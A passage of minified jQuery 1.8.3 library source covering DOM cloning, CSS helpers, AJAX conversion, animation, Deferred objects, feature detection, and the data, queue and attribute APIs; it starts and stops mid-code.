n;if(t.nodeType!==1)return;t.clearAttributes&&t.clearAttributes(),t.mergeAttributes&&t.mergeAttributes(e),n=t.nodeName.toLowerCase(),n==="object"?(t.parentNode&&(t.outerHTML=e.outerHTML),v.support.html5Clone&&e.innerHTML&&!v.trim(t.innerHTML)&&(t.innerHTML=e.innerHTML)):n==="input"&&Et.test(e.type)?(t.defaultChecked=t.checked=e.checked,t.value!==e.value&&(t.value=e.value)):n==="option"?t.selected=e.defaultSelected:n==="input"||n==="textarea"?t.defaultValue=e.defaultValue:n==="script"&&t.text!==e.text&&(t.text=e.text),t.removeAttribute(v.expando)}function Mt(e){return typeof e.getElementsByTagName!="undefined"?e.getElementsByTagName("*"):typeof e.querySelectorAll!="undefined"?e.querySelectorAll("*"):[]}function _t(e){Et.test(e.type)&&(e.defaultChecked=e.checked)}function Qt(e,t){if(t in e)return t;var n=t.charAt(0).toUpperCase()+t.slice(1),r=t,i=Jt.length;while(i--){t=Jt[i]+n;if(t in e)return t}return r}function Gt(e,t){return e=t||e,v.css(e,"display")==="none"||!v.contains(e.ownerDocument,e)}function Yt(e,t){var n,r,i=[],s=0,o=e.length;for(;s<o;s++){n=e[s];if(!n.style)continue;i[s]=v._data(n,"olddisplay"),t?(!i[s]&&n.style.display==="none"&&(n.style.display=""),n.style.display===""&&Gt(n)&&(i[s]=v._data(n,"olddisplay",nn(n.nodeName)))):(r=Dt(n,"display"),!i[s]&&r!=="none"&&v._data(n,"olddisplay",r))}for(s=0;s<o;s++){n=e[s];if(!n.style)continue;if(!t||n.style.display==="none"||n.style.display==="")n.style.display=t?i[s]||"":"none"}return e}function Zt(e,t,n){var r=Rt.exec(t);return r?Math.max(0,r[1]-(n||0))+(r[2]||"px"):t}function en(e,t,n,r){var i=n===(r?"border":"content")?4:t==="width"?1:0,s=0;for(;i<4;i+=2)n==="margin"&&(s+=v.css(e,n+$t[i],!0)),r?(n==="content"&&(s-=parseFloat(Dt(e,"padding"+$t[i]))||0),n!=="margin"&&(s-=parseFloat(Dt(e,"border"+$t[i]+"Width"))||0)):(s+=parseFloat(Dt(e,"padding"+$t[i]))||0,n!=="padding"&&(s+=parseFloat(Dt(e,"border"+$t[i]+"Width"))||0));return s}function tn(e,t,n){var r=t==="width"?e.offsetWidth:e.offsetHeight,i=!0,s=v.support.boxSizing&&v.css(e,"boxSizing")==="border-box";if(r<=0||r==null){r=Dt(e,t);if(r<0||r==null)r=e.style[t];if(Ut.test(r))return r;i=s&&(v.support.boxSizingReliable||r===e.style[t]),r=parseFloat(r)||0}return r+en(e,t,n||(s?"border":"content"),i)+"px"}function nn(e){if(Wt[e])return Wt[e];var t=v("<"+e+">").appendTo(i.body),n=t.css("display");t.remove();if(n==="none"||n===""){Pt=i.body.appendChild(Pt||v.extend(i.createElement("iframe"),{frameBorder:0,width:0,height:0}));if(!Ht||!Pt.createElement)Ht=(Pt.contentWindow||Pt.contentDocument).document,Ht.write("<!doctype html><html><body>"),Ht.close();t=Ht.body.appendChild(Ht.createElement(e)),n=Dt(t,"display"),i.body.removeChild(Pt)}return Wt[e]=n,n}function fn(e,t,n,r){var i;if(v.isArray(t))v.each(t,function(t,i){n||sn.test(e)?r(e,i):fn(e+"["+(typeof i=="object"?t:"")+"]",i,n,r)});else if(!n&&v.type(t)==="object")for(i in t)fn(e+"["+i+"]",t[i],n,r);else r(e,t)}function Cn(e){return function(t,n){typeof t!="string"&&(n=t,t="*");var r,i,s,o=t.toLowerCase().split(y),u=0,a=o.length;if(v.isFunction(n))for(;u<a;u++)r=o[u],s=/^\+/.test(r),s&&(r=r.substr(1)||"*"),i=e[r]=e[r]||[],i[s?"unshift":"push"](n)}}function kn(e,n,r,i,s,o){s=s||n.dataTypes[0],o=o||{},o[s]=!0;var u,a=e[s],f=0,l=a?a.length:0,c=e===Sn;for(;f<l&&(c||!u);f++)u=a[f](n,r,i),typeof u=="string"&&(!c||o[u]?u=t:(n.dataTypes.unshift(u),u=kn(e,n,r,i,u,o)));return(c||!u)&&!o["*"]&&(u=kn(e,n,r,i,"*",o)),u}function Ln(e,n){var r,i,s=v.ajaxSettings.flatOptions||{};for(r in n)n[r]!==t&&((s[r]?e:i||(i={}))[r]=n[r]);i&&v.extend(!0,e,i)}function An(e,n,r){var i,s,o,u,a=e.contents,f=e.dataTypes,l=e.responseFields;for(s in l)s in r&&(n[l[s]]=r[s]);while(f[0]==="*")f.shift(),i===t&&(i=e.mimeType||n.getResponseHeader("content-type"));if(i)for(s in a)if(a[s]&&a[s].test(i)){f.unshift(s);break}if(f[0]in r)o=f[0];else{for(s in r){if(!f[0]||e.converters[s+" "+f[0]]){o=s;break}u||(u=s)}o=o||u}if(o)return o!==f[0]&&f.unshift(o),r[o]}function On(e,t){var n,r,i,s,o=e.dataTypes.slice(),u=o[0],a={},f=0;e.dataFilter&&(t=e.dataFilter(t,e.dataType));if(o[1])for(n in e.converters)a[n.toLowerCase()]=e.converters[n];for(;i=o[++f];)if(i!=="*"){if(u!=="*"&&u!==i){n=a[u+" "+i]||a["* "+i];if(!n)for(r in a){s=r.split(" ");if(s[1]===i){n=a[u+" "+s[0]]||a["* "+s[0]];if(n){n===!0?n=a[r]:a[r]!==!0&&(i=s[0],o.splice(f--,0,i));break}}}if(n!==!0)if(n&&e["throws"])t=n(t);else try{t=n(t)}catch(l){return{state:"parsererror",error:n?l:"No conversion from "+u+" to "+i}}}u=i}return{state:"success",data:t}}function Fn(){try{return new e.XMLHttpRequest}catch(t){}}function In(){try{return new e.ActiveXObject("Microsoft.XMLHTTP")}catch(t){}}function $n(){return setTimeout(function(){qn=t},0),qn=v.now()}function Jn(e,t){v.each(t,function(t,n){var r=(Vn[t]||[]).concat(Vn["*"]),i=0,s=r.length;for(;i<s;i++)if(r[i].call(e,t,n))return})}function Kn(e,t,n){var r,i=0,s=0,o=Xn.length,u=v.Deferred().always(function(){delete a.elem}),a=function(){var t=qn||$n(),n=Math.max(0,f.startTime+f.duration-t),r=n/f.duration||0,i=1-r,s=0,o=f.tweens.length;for(;s<o;s++)f.tweens[s].run(i);return u.notifyWith(e,[f,i,n]),i<1&&o?n:(u.resolveWith(e,[f]),!1)},f=u.promise({elem:e,props:v.extend({},t),opts:v.extend(!0,{specialEasing:{}},n),originalProperties:t,originalOptions:n,startTime:qn||$n(),duration:n.duration,tweens:[],createTween:function(t,n,r){var i=v.Tween(e,f.opts,t,n,f.opts.specialEasing[t]||f.opts.easing);return f.tweens.push(i),i},stop:function(t){var n=0,r=t?f.tweens.length:0;for(;n<r;n++)f.tweens[n].run(1);return t?u.resolveWith(e,[f,t]):u.rejectWith(e,[f,t]),this}}),l=f.props;Qn(l,f.opts.specialEasing);for(;i<o;i++){r=Xn[i].call(f,e,l,f.opts);if(r)return r}return Jn(f,l),v.isFunction(f.opts.start)&&f.opts.start.call(e,f),v.fx.timer(v.extend(a,{anim:f,queue:f.opts.queue,elem:e})),f.progress(f.opts.progress).done(f.opts.done,f.opts.complete).fail(f.opts.fail).always(f.opts.always)}function Qn(e,t){var n,r,i,s,o;for(n in e){r=v.camelCase(n),i=t[r],s=e[n],v.isArray(s)&&(i=s[1],s=e[n]=s[0]),n!==r&&(e[r]=s,delete e[n]),o=v.cssHooks[r];if(o&&"expand"in o){s=o.expand(s),delete e[r];for(n in s)n in e||(e[n]=s[n],t[n]=i)}else t[r]=i}}function Gn(e,t,n){var r,i,s,o,u,a,f,l,c,h=this,p=e.style,d={},m=[],g=e.nodeType&&Gt(e);n.queue||(l=v._queueHooks(e,"fx"),l.unqueued==null&&(l.unqueued=0,c=l.empty.fire,l.empty.fire=function(){l.unqueued||c()}),l.unqueued++,h.always(function(){h.always(function(){l.unqueued--,v.queue(e,"fx").length||l.empty.fire()})})),e.nodeType===1&&("height"in t||"width"in t)&&(n.overflow=[p.overflow,p.overflowX,p.overflowY],v.css(e,"display")==="inline"&&v.css(e,"float")==="none"&&(!v.support.inlineBlockNeedsLayout||nn(e.nodeName)==="inline"?p.display="inline-block":p.zoom=1)),n.overflow&&(p.overflow="hidden",v.support.shrinkWrapBlocks||h.done(function(){p.overflow=n.overflow[0],p.overflowX=n.overflow[1],p.overflowY=n.overflow[2]}));for(r in t){s=t[r];if(Un.exec(s)){delete t[r],a=a||s==="toggle";if(s===(g?"hide":"show"))continue;m.push(r)}}o=m.length;if(o){u=v._data(e,"fxshow")||v._data(e,"fxshow",{}),"hidden"in u&&(g=u.hidden),a&&(u.hidden=!g),g?v(e).show():h.done(function(){v(e).hide()}),h.done(function(){var t;v.removeData(e,"fxshow",!0);for(t in d)v.style(e,t,d[t])});for(r=0;r<o;r++)i=m[r],f=h.createTween(i,g?u[i]:0),d[i]=u[i]||v.style(e,i),i in u||(u[i]=f.start,g&&(f.end=f.start,f.start=i==="width"||i==="height"?1:0))}}function Yn(e,t,n,r,i){return new Yn.prototype.init(e,t,n,r,i)}function Zn(e,t){var n,r={height:e},i=0;t=t?1:0;for(;i<4;i+=2-t)n=$t[i],r["margin"+n]=r["padding"+n]=e;return t&&(r.opacity=r.width=e),r}function tr(e){return v.isWindow(e)?e:e.nodeType===9?e.defaultView||e.parentWindow:!1}var n,r,i=e.document,s=e.location,o=e.navigator,u=e.jQuery,a=e.$,f=Array.prototype.push,l=Array.prototype.slice,c=Array.prototype.indexOf,h=Object.prototype.toString,p=Object.prototype.hasOwnProperty,d=String.prototype.trim,v=function(e,t){return new v.fn.init(e,t,n)},m=/[\-+]?(?:\d*\.|)\d+(?:[eE][\-+]?\d+|)/.source,g=/\S/,y=/\s+/,b=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,w=/^(?:[^#<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/,E=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,S=/^[\],:{}\s]*$/,x=/(?:^|:|,)(?:\s*\[)+/g,T=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,N=/"[^"\\\r\n]*"|true|false|null|-?(?:\d\d*\.|)\d+(?:[eE][\-+]?\d+|)/g,C=/^-ms-/,k=/-([\da-z])/gi,L=function(e,t){return(t+"").toUpperCase()},A=function(){i.addEventListener?(i.removeEventListener("DOMContentLoaded",A,!1),v.ready()):i.readyState==="complete"&&(i.detachEvent("onreadystatechange",A),v.ready())},O={};v.fn=v.prototype={constructor:v,init:function(e,n,r){var s,o,u,a;if(!e)return this;if(e.nodeType)return this.context=this[0]=e,this.length=1,this;if(typeof e=="string"){e.charAt(0)==="<"&&e.charAt(e.length-1)===">"&&e.length>=3?s=[null,e,null]:s=w.exec(e);if(s&&(s[1]||!n)){if(s[1])return n=n instanceof v?n[0]:n,a=n&&n.nodeType?n.ownerDocument||n:i,e=v.parseHTML(s[1],a,!0),E.test(s[1])&&v.isPlainObject(n)&&this.attr.call(e,n,!0),v.merge(this,e);o=i.getElementById(s[2]);if(o&&o.parentNode){if(o.id!==s[2])return r.find(e);this.length=1,this[0]=o}return this.context=i,this.selector=e,this}return!n||n.jquery?(n||r).find(e):this.constructor(n).find(e)}return v.isFunction(e)?r.ready(e):(e.selector!==t&&(this.selector=e.selector,this.context=e.context),v.makeArray(e,this))},selector:"",jquery:"1.8.3",length:0,size:function(){return this.length},toArray:function(){return l.call(this)},get:function(e){return e==null?this.toArray():e<0?this[this.length+e]:this[e]},pushStack:function(e,t,n){var r=v.merge(this.constructor(),e);return r.prevObject=this,r.context=this.context,t==="find"?r.selector=this.selector+(this.selector?" ":"")+n:t&&(r.selector=this.selector+"."+t+"("+n+")"),r},each:function(e,t){return v.each(this,e,t)},ready:function(e){return v.ready.promise().done(e),this},eq:function(e){return e=+e,e===-1?this.slice(e):this.slice(e,e+1)},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},slice:function(){return this.pushStack(l.apply(this,arguments),"slice",l.call(arguments).join(","))},map:function(e){return this.pushStack(v.map(this,function(t,n){return e.call(t,n,t)}))},end:function(){return this.prevObject||this.constructor(null)},push:f,sort:[].sort,splice:[].splice},v.fn.init.prototype=v.fn,v.extend=v.fn.extend=function(){var e,n,r,i,s,o,u=arguments[0]||{},a=1,f=arguments.length,l=!1;typeof u=="boolean"&&(l=u,u=arguments[1]||{},a=2),typeof u!="object"&&!v.isFunction(u)&&(u={}),f===a&&(u=this,--a);for(;a<f;a++)if((e=arguments[a])!=null)for(n in e){r=u[n],i=e[n];if(u===i)continue;l&&i&&(v.isPlainObject(i)||(s=v.isArray(i)))?(s?(s=!1,o=r&&v.isArray(r)?r:[]):o=r&&v.isPlainObject(r)?r:{},u[n]=v.extend(l,o,i)):i!==t&&(u[n]=i)}return u},v.extend({noConflict:function(t){return e.$===v&&(e.$=a),t&&e.jQuery===v&&(e.jQuery=u),v},isReady:!1,readyWait:1,holdReady:function(e){e?v.readyWait++:v.ready(!0)},ready:function(e){if(e===!0?--v.readyWait:v.isReady)return;if(!i.body)return setTimeout(v.ready,1);v.isReady=!0;if(e!==!0&&--v.readyWait>0)return;r.resolveWith(i,[v]),v.fn.trigger&&v(i).trigger("ready").off("ready")},isFunction:function(e){return v.type(e)==="function"},isArray:Array.isArray||function(e){return v.type(e)==="array"},isWindow:function(e){return e!=null&&e==e.window},isNumeric:function(e){return!isNaN(parseFloat(e))&&isFinite(e)},type:function(e){return e==null?String(e):O[h.call(e)]||"object"},isPlainObject:function(e){if(!e||v.type(e)!=="object"||e.nodeType||v.isWindow(e))return!1;try{if(e.constructor&&!p.call(e,"constructor")&&!p.call(e.constructor.prototype,"isPrototypeOf"))return!1}catch(n){return!1}var r;for(r in e);return r===t||p.call(e,r)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},error:function(e){throw new Error(e)},parseHTML:function(e,t,n){var r;return!e||typeof e!="string"?null:(typeof t=="boolean"&&(n=t,t=0),t=t||i,(r=E.exec(e))?[t.createElement(r[1])]:(r=v.buildFragment([e],t,n?null:[]),v.merge([],(r.cacheable?v.clone(r.fragment):r.fragment).childNodes)))},parseJSON:function(t){if(!t||typeof t!="string")return null;t=v.trim(t);if(e.JSON&&e.JSON.parse)return e.JSON.parse(t);if(S.test(t.replace(T,"@").replace(N,"]").replace(x,"")))return(new Function("return "+t))();v.error("Invalid JSON: "+t)},parseXML:function(n){var r,i;if(!n||typeof n!="string")return null;try{e.DOMParser?(i=new DOMParser,r=i.parseFromString(n,"text/xml")):(r=new ActiveXObject("Microsoft.XMLDOM"),r.async="false",r.loadXML(n))}catch(s){r=t}return(!r||!r.documentElement||r.getElementsByTagName("parsererror").length)&&v.error("Invalid XML: "+n),r},noop:function(){},globalEval:function(t){t&&g.test(t)&&(e.execScript||function(t){e.eval.call(e,t)})(t)},camelCase:function(e){return e.replace(C,"ms-").replace(k,L)},nodeName:function(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()},each:function(e,n,r){var i,s=0,o=e.length,u=o===t||v.isFunction(e);if(r){if(u){for(i in e)if(n.apply(e[i],r)===!1)break}else for(;s<o;)if(n.apply(e[s++],r)===!1)break}else if(u){for(i in e)if(n.call(e[i],i,e[i])===!1)break}else for(;s<o;)if(n.call(e[s],s,e[s++])===!1)break;return e},trim:d&&!d.call("\ufeff\u00a0")?function(e){return e==null?"":d.call(e)}:function(e){return e==null?"":(e+"").replace(b,"")},makeArray:function(e,t){var n,r=t||[];return e!=null&&(n=v.type(e),e.length==null||n==="string"||n==="function"||n==="regexp"||v.isWindow(e)?f.call(r,e):v.merge(r,e)),r},inArray:function(e,t,n){var r;if(t){if(c)return c.call(t,e,n);r=t.length,n=n?n<0?Math.max(0,r+n):n:0;for(;n<r;n++)if(n in t&&t[n]===e)return n}return-1},merge:function(e,n){var r=n.length,i=e.length,s=0;if(typeof r=="number")for(;s<r;s++)e[i++]=n[s];else while(n[s]!==t)e[i++]=n[s++];return e.length=i,e},grep:function(e,t,n){var r,i=[],s=0,o=e.length;n=!!n;for(;s<o;s++)r=!!t(e[s],s),n!==r&&i.push(e[s]);return i},map:function(e,n,r){var i,s,o=[],u=0,a=e.length,f=e instanceof v||a!==t&&typeof a=="number"&&(a>0&&e[0]&&e[a-1]||a===0||v.isArray(e));if(f)for(;u<a;u++)i=n(e[u],u,r),i!=null&&(o[o.length]=i);else for(s in e)i=n(e[s],s,r),i!=null&&(o[o.length]=i);return o.concat.apply([],o)},guid:1,proxy:function(e,n){var r,i,s;return typeof n=="string"&&(r=e[n],n=e,e=r),v.isFunction(e)?(i=l.call(arguments,2),s=function(){return e.apply(n,i.concat(l.call(arguments)))},s.guid=e.guid=e.guid||v.guid++,s):t},access:function(e,n,r,i,s,o,u){var a,f=r==null,l=0,c=e.length;if(r&&typeof r=="object"){for(l in r)v.access(e,n,l,r[l],1,o,i);s=1}else if(i!==t){a=u===t&&v.isFunction(i),f&&(a?(a=n,n=function(e,t,n){return a.call(v(e),n)}):(n.call(e,i),n=null));if(n)for(;l<c;l++)n(e[l],r,a?i.call(e[l],l,n(e[l],r)):i,u);s=1}return s?e:f?n.call(e):c?n(e[0],r):o},now:function(){return(new Date).getTime()}}),v.ready.promise=function(t){if(!r){r=v.Deferred();if(i.readyState==="complete")setTimeout(v.ready,1);else if(i.addEventListener)i.addEventListener("DOMContentLoaded",A,!1),e.addEventListener("load",v.ready,!1);else{i.attachEvent("onreadystatechange",A),e.attachEvent("onload",v.ready);var n=!1;try{n=e.frameElement==null&&i.documentElement}catch(s){}n&&n.doScroll&&function o(){if(!v.isReady){try{n.doScroll("left")}catch(e){return setTimeout(o,50)}v.ready()}}()}}return r.promise(t)},v.each("Boolean Number String Function Array Date RegExp Object".split(" "),function(e,t){O["[object "+t+"]"]=t.toLowerCase()}),n=v(i);var M={};v.Callbacks=function(e){e=typeof e=="string"?M[e]||_(e):v.extend({},e);var n,r,i,s,o,u,a=[],f=!e.once&&[],l=function(t){n=e.memory&&t,r=!0,u=s||0,s=0,o=a.length,i=!0;for(;a&&u<o;u++)if(a[u].apply(t[0],t[1])===!1&&e.stopOnFalse){n=!1;break}i=!1,a&&(f?f.length&&l(f.shift()):n?a=[]:c.disable())},c={add:function(){if(a){var t=a.length;(function r(t){v.each(t,function(t,n){var i=v.type(n);i==="function"?(!e.unique||!c.has(n))&&a.push(n):n&&n.length&&i!=="string"&&r(n)})})(arguments),i?o=a.length:n&&(s=t,l(n))}return this},remove:function(){return a&&v.each(arguments,function(e,t){var n;while((n=v.inArray(t,a,n))>-1)a.splice(n,1),i&&(n<=o&&o--,n<=u&&u--)}),this},has:function(e){return v.inArray(e,a)>-1},empty:function(){return a=[],this},disable:function(){return a=f=n=t,this},disabled:function(){return!a},lock:function(){return f=t,n||c.disable(),this},locked:function(){return!f},fireWith:function(e,t){return t=t||[],t=[e,t.slice?t.slice():t],a&&(!r||f)&&(i?f.push(t):l(t)),this},fire:function(){return c.fireWith(this,arguments),this},fired:function(){return!!r}};return c},v.extend({Deferred:function(e){var t=[["resolve","done",v.Callbacks("once memory"),"resolved"],["reject","fail",v.Callbacks("once memory"),"rejected"],["notify","progress",v.Callbacks("memory")]],n="pending",r={state:function(){return n},always:function(){return i.done(arguments).fail(arguments),this},then:function(){var e=arguments;return v.Deferred(function(n){v.each(t,function(t,r){var s=r[0],o=e[t];i[r[1]](v.isFunction(o)?function(){var e=o.apply(this,arguments);e&&v.isFunction(e.promise)?e.promise().done(n.resolve).fail(n.reject).progress(n.notify):n[s+"With"](this===i?n:this,[e])}:n[s])}),e=null}).promise()},promise:function(e){return e!=null?v.extend(e,r):r}},i={};return r.pipe=r.then,v.each(t,function(e,s){var o=s[2],u=s[3];r[s[1]]=o.add,u&&o.add(function(){n=u},t[e^1][2].disable,t[2][2].lock),i[s[0]]=o.fire,i[s[0]+"With"]=o.fireWith}),r.promise(i),e&&e.call(i,i),i},when:function(e){var t=0,n=l.call(arguments),r=n.length,i=r!==1||e&&v.isFunction(e.promise)?r:0,s=i===1?e:v.Deferred(),o=function(e,t,n){return function(r){t[e]=this,n[e]=arguments.length>1?l.call(arguments):r,n===u?s.notifyWith(t,n):--i||s.resolveWith(t,n)}},u,a,f;if(r>1){u=new Array(r),a=new Array(r),f=new Array(r);for(;t<r;t++)n[t]&&v.isFunction(n[t].promise)?n[t].promise().done(o(t,f,n)).fail(s.reject).progress(o(t,a,u)):--i}return i||s.resolveWith(f,n),s.promise()}}),v.support=function(){var t,n,r,s,o,u,a,f,l,c,h,p=i.createElement("div");p.setAttribute("className","t"),p.innerHTML="  <link/><table></table><a href='/a'>a</a><input type='checkbox'/>",n=p.getElementsByTagName("*"),r=p.getElementsByTagName("a")[0];if(!n||!r||!n.length)return{};s=i.createElement("select"),o=s.appendChild(i.createElement("option")),u=p.getElementsByTagName("input")[0],r.style.cssText="top:1px;float:left;opacity:.5",t={leadingWhitespace:p.firstChild.nodeType===3,tbody:!p.getElementsByTagName("tbody").length,htmlSerialize:!!p.getElementsByTagName("link").length,style:/top/.test(r.getAttribute("style")),hrefNormalized:r.getAttribute("href")==="/a",opacity:/^0.5/.test(r.style.opacity),cssFloat:!!r.style.cssFloat,checkOn:u.value==="on",optSelected:o.selected,getSetAttribute:p.className!=="t",enctype:!!i.createElement("form").enctype,html5Clone:i.createElement("nav").cloneNode(!0).outerHTML!=="<:nav></:nav>",boxModel:i.compatMode==="CSS1Compat",submitBubbles:!0,changeBubbles:!0,focusinBubbles:!1,deleteExpando:!0,noCloneEvent:!0,inlineBlockNeedsLayout:!1,shrinkWrapBlocks:!1,reliableMarginRight:!0,boxSizingReliable:!0,pixelPosition:!1},u.checked=!0,t.noCloneChecked=u.cloneNode(!0).checked,s.disabled=!0,t.optDisabled=!o.disabled;try{delete p.test}catch(d){t.deleteExpando=!1}!p.addEventListener&&p.attachEvent&&p.fireEvent&&(p.attachEvent("onclick",h=function(){t.noCloneEvent=!1}),p.cloneNode(!0).fireEvent("onclick"),p.detachEvent("onclick",h)),u=i.createElement("input"),u.value="t",u.setAttribute("type","radio"),t.radioValue=u.value==="t",u.setAttribute("checked","checked"),u.setAttribute("name","t"),p.appendChild(u),a=i.createDocumentFragment(),a.appendChild(p.lastChild),t.checkClone=a.cloneNode(!0).cloneNode(!0).lastChild.checked,t.appendChecked=u.checked,a.removeChild(u),a.appendChild(p);if(p.attachEvent)for(l in{submit:!0,change:!0,focusin:!0})f="on"+l,c=f in p,c||(p.setAttribute(f,"return;"),c=typeof p[f]=="function"),t[l+"Bubbles"]=c;return v(function(){var n,r,s,o,u="padding:0;margin:0;border:0;display:block;overflow:hidden;",a=i.getElementsByTagName("body")[0];if(!a)return;n=i.createElement("div"),n.style.cssText="visibility:hidden;border:0;width:0;height:0;position:static;top:0;margin-top:1px",a.insertBefore(n,a.firstChild),r=i.createElement("div"),n.appendChild(r),r.innerHTML="<table><tr><td></td><td>t</td></tr></table>",s=r.getElementsByTagName("td"),s[0].style.cssText="padding:0;margin:0;border:0;display:none",c=s[0].offsetHeight===0,s[0].style.display="",s[1].style.display="none",t.reliableHiddenOffsets=c&&s[0].offsetHeight===0,r.innerHTML="",r.style.cssText="box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;padding:1px;border:1px;display:block;width:4px;margin-top:1%;position:absolute;top:1%;",t.boxSizing=r.offsetWidth===4,t.doesNotIncludeMarginInBodyOffset=a.offsetTop!==1,e.getComputedStyle&&(t.pixelPosition=(e.getComputedStyle(r,null)||{}).top!=="1%",t.boxSizingReliable=(e.getComputedStyle(r,null)||{width:"4px"}).width==="4px",o=i.createElement("div"),o.style.cssText=r.style.cssText=u,o.style.marginRight=o.style.width="0",r.style.width="1px",r.appendChild(o),t.reliableMarginRight=!parseFloat((e.getComputedStyle(o,null)||{}).marginRight)),typeof r.style.zoom!="undefined"&&(r.innerHTML="",r.style.cssText=u+"width:1px;padding:1px;display:inline;zoom:1",t.inlineBlockNeedsLayout=r.offsetWidth===3,r.style.display="block",r.style.overflow="visible",r.innerHTML="<div></div>",r.firstChild.style.width="5px",t.shrinkWrapBlocks=r.offsetWidth!==3,n.style.zoom=1),a.removeChild(n),n=r=s=o=null}),a.removeChild(p),n=r=s=o=u=a=p=null,t}();var D=/(?:\{[\s\S]*\}|\[[\s\S]*\])$/,P=/([A-Z])/g;v.extend({cache:{},deletedIds:[],uuid:0,expando:"jQuery"+(v.fn.jquery+Math.random()).replace(/\D/g,""),noData:{embed:!0,object:"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000",applet:!0},hasData:function(e){return e=e.nodeType?v.cache[e[v.expando]]:e[v.expando],!!e&&!B(e)},data:function(e,n,r,i){if(!v.acceptData(e))return;var s,o,u=v.expando,a=typeof n=="string",f=e.nodeType,l=f?v.cache:e,c=f?e[u]:e[u]&&u;if((!c||!l[c]||!i&&!l[c].data)&&a&&r===t)return;c||(f?e[u]=c=v.deletedIds.pop()||v.guid++:c=u),l[c]||(l[c]={},f||(l[c].toJSON=v.noop));if(typeof n=="object"||typeof n=="function")i?l[c]=v.extend(l[c],n):l[c].data=v.extend(l[c].data,n);return s=l[c],i||(s.data||(s.data={}),s=s.data),r!==t&&(s[v.camelCase(n)]=r),a?(o=s[n],o==null&&(o=s[v.camelCase(n)])):o=s,o},removeData:function(e,t,n){if(!v.acceptData(e))return;var r,i,s,o=e.nodeType,u=o?v.cache:e,a=o?e[v.expando]:v.expando;if(!u[a])return;if(t){r=n?u[a]:u[a].data;if(r){v.isArray(t)||(t in r?t=[t]:(t=v.camelCase(t),t in r?t=[t]:t=t.split(" ")));for(i=0,s=t.length;i<s;i++)delete r[t[i]];if(!(n?B:v.isEmptyObject)(r))return}}if(!n){delete u[a].data;if(!B(u[a]))return}o?v.cleanData([e],!0):v.support.deleteExpando||u!=u.window?delete u[a]:u[a]=null},_data:function(e,t,n){return v.data(e,t,n,!0)},acceptData:function(e){var t=e.nodeName&&v.noData[e.nodeName.toLowerCase()];return!t||t!==!0&&e.getAttribute("classid")===t}}),v.fn.extend({data:function(e,n){var r,i,s,o,u,a=this[0],f=0,l=null;if(e===t){if(this.length){l=v.data(a);if(a.nodeType===1&&!v._data(a,"parsedAttrs")){s=a.attributes;for(u=s.length;f<u;f++)o=s[f].name,o.indexOf("data-")||(o=v.camelCase(o.substring(5)),H(a,o,l[o]));v._data(a,"parsedAttrs",!0)}}return l}return typeof e=="object"?this.each(function(){v.data(this,e)}):(r=e.split(".",2),r[1]=r[1]?"."+r[1]:"",i=r[1]+"!",v.access(this,function(n){if(n===t)return l=this.triggerHandler("getData"+i,[r[0]]),l===t&&a&&(l=v.data(a,e),l=H(a,e,l)),l===t&&r[1]?this.data(r[0]):l;r[1]=n,this.each(function(){var t=v(this);t.triggerHandler("setData"+i,r),v.data(this,e,n),t.triggerHandler("changeData"+i,r)})},null,n,arguments.length>1,null,!1))},removeData:function(e){return this.each(function(){v.removeData(this,e)})}}),v.extend({queue:function(e,t,n){var r;if(e)return t=(t||"fx")+"queue",r=v._data(e,t),n&&(!r||v.isArray(n)?r=v._data(e,t,v.makeArray(n)):r.push(n)),r||[]},dequeue:function(e,t){t=t||"fx";var n=v.queue(e,t),r=n.length,i=n.shift(),s=v._queueHooks(e,t),o=function(){v.dequeue(e,t)};i==="inprogress"&&(i=n.shift(),r--),i&&(t==="fx"&&n.unshift("inprogress"),delete s.stop,i.call(e,o,s)),!r&&s&&s.empty.fire()},_queueHooks:function(e,t){var n=t+"queueHooks";return v._data(e,n)||v._data(e,n,{empty:v.Callbacks("once memory").add(function(){v.removeData(e,t+"queue",!0),v.removeData(e,n,!0)})})}}),v.fn.extend({queue:function(e,n){var r=2;return typeof e!="string"&&(n=e,e="fx",r--),arguments.length<r?v.queue(this[0],e):n===t?this:this.each(function(){var t=v.queue(this,e,n);v._queueHooks(this,e),e==="fx"&&t[0]!=="inprogress"&&v.dequeue(this,e)})},dequeue:function(e){return this.each(function(){v.dequeue(this,e)})},delay:function(e,t){return e=v.fx?v.fx.speeds[e]||e:e,t=t||"fx",this.queue(t,function(t,n){var r=setTimeout(t,e);n.stop=function(){clearTimeout(r)}})},clearQueue:function(e){return this.queue(e||"fx",[])},promise:function(e,n){var r,i=1,s=v.Deferred(),o=this,u=this.length,a=function(){--i||s.resolveWith(o,[o])};typeof e!="string"&&(n=e,e=t),e=e||"fx";while(u--)r=v._data(o[u],e+"queueHooks"),r&&r.empty&&(i++,r.empty.add(a));return a(),s.promise(n)}});var j,F,I,q=/[\t\r\n]/g,R=/\r/g,U=/^(?:button|input)$/i,z=/^(?:button|input|object|select|textarea)$/i,W=/^a(?:rea|)$/i,X=/^(?:autofocus|autoplay|async|checked|controls|defer|disabled|hidden|loop|multiple|open|readonly|required|scoped|selected)$/i,V=v.support.getSetAttribute;v.fn.extend({attr:function(e,t){return v.access(this,v.attr,e,t,arguments.length>1)},removeAttr:function(e){return this.each(function(){v.removeAttr(this,e)})},prop:function(e,t){return v.access(this,v.prop,e,t,arguments.length>1)},removeProp:function(e){return e=v.propFix[e]||e,this.each(function(){try{this[e]=t,delete this[e]}catch(n){}})},addClass:function(e){var t,n,r,i,s,o,u;if(v.isFunction(e))return this.each(function(t){v(this).addClass(e.call(this,t,this.className))});if(e&&typeof e=="string"){t=e.split(y);for(n=0,r=this.length;n<r;n++){i=this[n];if(i.nodeType===1)if(!i.className&&t.length===1)i.className=e;else{s=" "+i.className+" ";for(o=0,u=t.length;o<u;o++)s.indexOf(" "+t[o]+" ")<0&&(s+=t[o]+" ");i.className=v.trim(s)}}}return this},removeClass:function(e){var n,r,i,s,o,u,a;if(v.isFunction(e))return this.each(function(t){v(this).removeClass(e.call(this,t,this.className))});if(e&&typeof e=="string"||e===t){n=(e||"").split(y);for(u=0,a=this.length;u<a;u++){i=this[u];if(i.nodeType===1&&i.className){r=(" "+i.className+" ").replace(q," 